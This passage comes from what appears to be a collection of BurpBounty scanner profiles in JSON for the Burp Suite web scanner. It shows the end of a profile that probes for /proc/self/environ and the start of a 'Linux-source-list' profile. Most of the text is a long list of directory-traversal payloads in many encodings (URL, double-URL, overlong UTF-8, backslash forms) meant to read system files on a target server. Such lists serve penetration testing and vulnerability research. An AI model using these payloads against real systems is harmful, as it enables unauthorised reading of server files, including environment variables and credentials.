"true,../..//../..//..///{FILE}",
"true,../..//../..//../..///{FILE}",
"true,../..//../..//../..//..///{FILE}",
"true,../..//../..//../..//../..///{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,HTTP_USER_AGENT"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-self-environ",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Linux-self-environ",
"RemediationDetail": "",
"IssueBackground": "Linux-self-environ",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "proc/self/environ",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-source-list.bb | [
{
"ProfileName": "Linux-source-list",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,..%c0%af{FILE}",
"true,..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,..%%32%66{FILE}",
"true,..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,..%%35%63{FILE}",
"true,..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
